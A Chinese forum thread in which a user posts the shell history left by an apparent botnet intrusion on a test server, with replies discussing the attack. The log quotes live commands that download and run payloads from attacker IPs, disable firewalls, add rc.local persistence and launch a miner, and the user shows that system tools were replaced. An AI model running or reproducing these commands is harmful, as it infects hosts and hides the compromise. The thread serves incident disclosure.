~ # cat .ash_history
service iptables stop
wget http://211.147.119.195:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
./Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod u+x Linux2.6
./Linux2.6 &
chmod u+x Linux2.6
./Linux2.6 &
cd /tmp
service iptables stop
wget http://211.147.119.195:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
./164
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod u+x Linux2.6
./Linux2.6 &
chmod u+x dos6cc4
./Linux2.6 &
cd /tmp
echo "cd /root/">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
/gisdfoewrsfdf
/bin/busybox cp; /gisdfoewrsfdf
/bin/busybox mount ;/gisdfoewrsfdf
/bin/busybox echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm -f /tmp/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; /bin/busybox cat /var/tmp/.nippon; /bin/busybox rm -f /var/tmp/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox cat //.nippon; /bin/busybox rm -f //.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm -f /proc/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm -f /dev/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm -f /dev/pts/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm -f /sys/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; /bin/busybox cat /sys/fs/cgroup/.nippon; /bin/busybox rm -f /sys/fs/cgroup/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; /bin/busybox cat /sys/fs/cgroup/systemd/.nippon; /bin/busybox rm -f /sys/fs/cgroup/systemd/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; /bin/busybox cat /sys/fs/cgroup/cpuset/.nippon; /bin/busybox rm -f /sys/fs/cgroup/cpuset/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/perf_event' > /sys/fs/cgroup/perf_event/.nippon; /bin/busybox cat /sys/fs/cgroup/perf_event/.nippon; /bin/busybox rm -f /sys/fs/cgroup/perf_event/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; /bin/busybox cat /sys/fs/cgroup/net_cls/.nippon; /bin/busybox rm -f /sys/fs/cgroup/net_cls/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuacct,cpu' > /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox cat /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox rm -f /sys/fs/cgroup/cpuacct,cpu/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; /bin/busybox cat /sys/fs/cgroup/blkio/.nippon; /bin/busybox rm -f /sys/fs/cgroup/blkio/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/memory' > /sys/fs/cgroup/memory/.nippon; /bin/busybox cat /sys/fs/cgroup/memory/.nippon; /bin/busybox rm -f /sys/fs/cgroup/memory/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; /bin/busybox cat /sys/fs/cgroup/freezer/.nippon; /bin/busybox rm -f /sys/fs/cgroup/freezer/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; /bin/busybox cat /sys/fs/cgroup/devices/.nippon; /bin/busybox rm -f /sys/fs/cgroup/devices/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/hugetlb' > /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox cat /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox rm -f /sys/fs/cgroup/hugetlb/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; /bin/busybox cat /dev/mqueue/.nippon; /bin/busybox rm -f /dev/mqueue/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/etc/resolv.conf' > /etc/resolv.conf/.nippon; /bin/busybox cat /etc/resolv.conf/.nippon; /bin/busybox rm -f /etc/resolv.conf/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/etc/hostname' > /etc/hostname/.nippon; /bin/busybox cat /etc/hostname/.nippon; /bin/busybox rm -f /etc/hostname/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/etc/hosts' > /etc/hosts/.nippon; /bin/busybox cat /etc/hosts/.nippon; /bin/busybox rm -f /etc/hosts/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm -f /dev/shm/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/var/lib/mysql' > /var/lib/mysql/.nippon; /bin/busybox cat /var/lib/mysql/.nippon; /bin/busybox rm -f /var/lib/mysql/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/bus' > /proc/bus/.nippon; /bin/busybox cat /proc/bus/.nippon; /bin/busybox rm -f /proc/bus/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/fs' > /proc/fs/.nippon; /bin/busybox cat /proc/fs/.nippon; /bin/busybox rm -f /proc/fs/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/irq' > /proc/irq/.nippon; /bin/busybox cat /proc/irq/.nippon; /bin/busybox rm -f /proc/irq/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/sys' > /proc/sys/.nippon; /bin/busybox cat /proc/sys/.nippon; /bin/busybox rm -f /proc/sys/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/sysrq-trigger' > /proc/sysrq-trigger/.nippon; /bin/busybox cat /proc/sysrq-trigger/.nippon; /bin/busybox rm -f /proc/sysrq-trigger/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/kcore' > /proc/kcore/.nippon; /bin/busybox cat /proc/kcore/.nippon; /bin/busybox rm -f /proc/kcore/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/timer_list' > /proc/timer_list/.nippon; /bin/busybox cat /proc/timer_list/.nippon; /bin/busybox rm -f /proc/timer_list/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/timer_stats' > /proc/timer_stats/.nippon; /bin/busybox cat /proc/timer_stats/.nippon; /bin/busybox rm -f /proc/timer_stats/.nippon
/bin/busybox echo -e '\x47\x72\x6f\x70/proc/sched_debug' > /proc/sched_debug/.nippon; /bin/busybox cat /proc/sched_debug/.nippon; /bin/busybox rm -f /proc/sched_debug/.nippon
/gisdfoewrsfdf
/bin/busybox cat /bin/echo ;/gisdfoewrsfdf
cd /tmp; /bin/busybox wget http://217.23.10.181/bins/usb_bus.x86 -O - > usb_bus ; /bin/busybox chmod 777 usb_bus ; ./usb_bus ;/gisdfoewrsfdf
service iptables stop
wget http://211.147.112.207:1611/Linux2.4
chmod 0755 /root/Linux2.4
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 777 Linux2.4
./Linux2.4
chmod 0755 /root/Linux2.4
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 0777 Linux2.4
chmod u+x Linux2.4
./Linux2.4 &
chmod u+x Linux2.4
./Linux2.4 &
cd /tmp
service iptables stop
wget http://211.147.112.207:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
service iptables stop
./164
wget http://211.147.112.207:1611/Linux2.4
chmod 0755 /root/Linux2.6
chmod 0755 /root/Linux2.4
nohup /root/Linux2.6 > /dev/null 2>&1 &
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod 777 Linux2.4
chmod u+x Linux2.6
./Linux2.4
./Linux2.6 &
chmod 0755 /root/Linux2.4
chmod u+x dos6cc4
nohup /root/Linux2.4 > /dev/null 2>&1 &
./Linux2.6 &
chmod 0777 Linux2.4
cd /tmp
chmod u+x Linux2.4
service iptables stop
./Linux2.4 &
wget http://211.147.112.207:1611/dd-wrt
chmod u+x Linux2.4
chmod 0755 /root/dd-wrt
./Linux2.4 &
nohup /root/dd-wrt > /dev/null 2>&1 &
cd /tmp
chmod 777 dd-wrt
service iptables stop
./dd-wrt
wget http://211.147.112.207:1611/Linux2.6
chmod 0755 /root/dd-wrt
chmod 0755 /root/Linux2.6
nohup /root/dd-wrt > /dev/null 2>&1 &
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 dd-wrt
chmod 777 Linux2.6
chmod u+x dd-wrt
./164
./dd-wrt &
chmod 0755 /root/Linux2.6
chmod u+x dd-wrt
nohup /root/Linux2.6 > /dev/null 2>&1 &
./dd-wrt &
chmod 0777 Linux2.6
cd /tmp
chmod u+x Linux2.6
service iptables stop
./Linux2.6 &
wget http://211.147.112.207:1611/linux-arm
chmod u+x dos6cc4
chmod 0755 /root/linux-arm
./Linux2.6 &
nohup /root/linux-arm > /dev/null 2>&1 &
cd /tmp
chmod 777 linux-arm
service iptables stop
./linux-arm
wget http://211.147.112.207:1611/dd-wrt
chmod 0755 /root/linux-arm
nohup /root/linux-arm > /dev/null 2>&1 &
chmod 0777 linux-arm
chmod u+x linux-arm
chmod 0755 /root/dd-wrt
nohup /root/dd-wrt > /dev/null 2>&1 &
chmod 777 dd-wrt
./dd-wrt
./linux-arm &
chmod 0755 /root/dd-wrt
chmod u+x linux-arm
nohup /root/dd-wrt > /dev/null 2>&1 &
./linux-arm &
chmod 0777 dd-wrt
cd /tmp
chmod u+x dd-wrt
service iptables stop
./dd-wrt &
wget http://211.147.112.207:1611/linux-mips
chmod u+x dd-wrt
./dd-wrt &
chmod 0755 /root/linux-mips
nohup /root/linux-mips > /dev/null 2>&1 &
cd /tmp
chmod 777 linux-mips
service iptables stop
./linux-mips
wget http://211.147.112.207:1611/linux-arm
chmod 0755 /root/linux-mips
chmod 0755 /root/linux-arm
nohup /root/linux-mips > /dev/null 2>&1 &
nohup /root/linux-arm > /dev/null 2>&1 &
chmod 0777 linux-mips
chmod 777 linux-arm
chmod u+x linux-mips
./linux-arm
./linux-mips &
chmod 0755 /root/linux-arm
chmod u+x linux-mips
nohup /root/linux-arm > /dev/null 2>&1 &
./linux-mips &
chmod 0777 linux-arm
cd /tmp
chmod u+x linux-arm
service iptables stop
./linux-arm &
wget http://211.147.112.207:1611/taskhost.exe
chmod u+x linux-arm
chmod 0755 /root/taskhost.exe
./linux-arm &
nohup /root/taskhost.exe > /dev/null 2>&1 &
cd /tmp
chmod 777 taskhost.exe
service iptables stop
./taskhost.exe
wget http://211.147.112.207:1611/linux-mips
chmod 0755 /root/taskhost.exe
chmod 0755 /root/linux-mips
nohup /root/taskhost.exe > /dev/null 2>&1 &
nohup /root/linux-mips > /dev/null 2>&1 &
chmod 0777 taskhost.exe
chmod 777 linux-mips
chmod u+x taskhost.exe
./linux-mips
./taskhost.exe &
chmod 0755 /root/linux-mips
chmod u+x taskhost.exe
nohup /root/linux-mips > /dev/null 2>&1 &
./taskhost.exe &
chmod 0777 linux-mips
chmod u+x linux-mips
cd /tmp
./linux-mips &
echo "cd /root/">>/etc/rc.local
chmod u+x linux-mips
echo "./Linux2.4&">>/etc/rc.local
./linux-mips &
echo "./Linux2.6&">>/etc/rc.local
cd /tmp
echo "./dd-wrt&">>/etc/rc.local
service iptables stop
echo "./linux-arm&">>/etc/rc.local
wget http://211.147.112.207:1611/taskhost.exe
echo "./linux-mips&">>/etc/rc.local
chmod 0755 /root/taskhost.exe
echo "./taskhost&">>/etc/rc.local
nohup /root/taskhost.exe > /dev/null 2>&1 &
echo "/etc/init.d/iptables stop">>/etc/rc.local
chmod 777 taskhost.exe
./taskhost.exe
chmod 0755 /root/taskhost.exe
nohup /root/taskhost.exe > /dev/null 2>&1 &
chmod 0777 taskhost.exe
chmod u+x taskhost.exe
./taskhost.exe &
chmod u+x taskhost.exe
./taskhost.exe &
cd /tmp
echo "cd /root/">>/etc/rc.local
echo "./Linux2.4&">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "./dd-wrt&">>/etc/rc.local
echo "./linux-arm&">>/etc/rc.local
echo "./linux-mips&">>/etc/rc.local
echo "./taskhost&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/bins.sh
chmod 777 bins.sh
./bins.sh
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/marlin
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
CD /tmp
wget http://115.236.92.99:8846/2500
chmod 777 2500
./2500 >/dev/null 2>&1 &
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
CD /tmp
wget http://115.236.92.99:12345/2500
chmod 777 2500
./2500 >/dev/null 2>&1 &
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/marlin
chmod 777 marlin
./marlin -u 55489a27a09840cc82aec8c48858d30ec184344b162fb99e904f41e860a4dfad53db10d7b3f7.AK1 -I 20
1
suconghou OP
/etc/init.d # ls
DbSecuritySpt QsystemsshMmt VsystemsshMdt mariadb rc.local selinux
/etc/init.d # rm *t
/etc/init.d # ls
mariadb rc.local selinux
/etc/init.d # cat selinux
#!/bin/bash
/usr/bin/bsd-port/getty
/etc/init.d # ls -lh /usr/bin/bsd-port/getty
-rwxr-xr-x 1 root root 1.2M Dec 17 15:49 /usr/bin/bsd-port/getty
/etc/init.d # md5sum /usr/bin/bsd-port/getty
2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/bsd-port/getty
/etc/init.d # md5sum /bin/ps
2dafa3cb07d8e13ae9bf9136ed97403c /bin/ps
/etc/init.d # md5sum /bin/netstat
2dafa3cb07d8e13ae9bf9136ed97403c /bin/netstat
/etc/init.d # md5sum /usr/bin/lsof
2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/lsof
/etc/init.d #
都是这个 2dafa(即 /bin/ps 、 /bin/netstat 、 /usr/bin/lsof 的 md5 与 /usr/bin/bsd-port/getty 完全相同,这些系统命令已被替换成同一个文件,在这台机器上它们的输出不可信)
|
2
swulling 2016-12-29 17:12:24 +08:00
这个不叫『黑客』,这个叫『脚本小子』
|
3
ryd994 2016-12-29 17:12:50 +08:00 via Android
一般不建议用 docker 做蜜罐,因为如果对方看出来的话,想打穿还是有可能的
|
4
suconghou OP 无意间成了蜜罐 已停用 ssh
|
5
megatron 2016-12-29 17:52:53 +08:00
这是照着教材来的?
说个好玩儿的,前两天一个测试机被入侵了,入侵者竟然帮我升级了 jdk ,我想了半天也不知道为什么。 |
6
xss 2016-12-29 18:18:04 +08:00
这个是自动化脚本干的, 并不是人进行的操作.
应该是僵尸网络中的节点在找更多的节点, 加入僵尸网络. |
7
suconghou OP 查了一下 可能是透过 redis 入侵的, cron 文件都被改了,redis 我开着外网端口来着.
|
8
tanszhe 2016-12-29 19:02:45 +08:00
干了什么啊?求大神解释一下这段代码干了什么?
|
9
dant 2016-12-29 23:51:20 +08:00
挖矿吧
|
10
maxwel1 2017-01-11 13:49:13 +08:00
测试用的 centos ,还在调试,然后过了个周末发现被执行了上面那个脚本,如果不重装的话,怎么清理干净呢?有什么办法吗?
|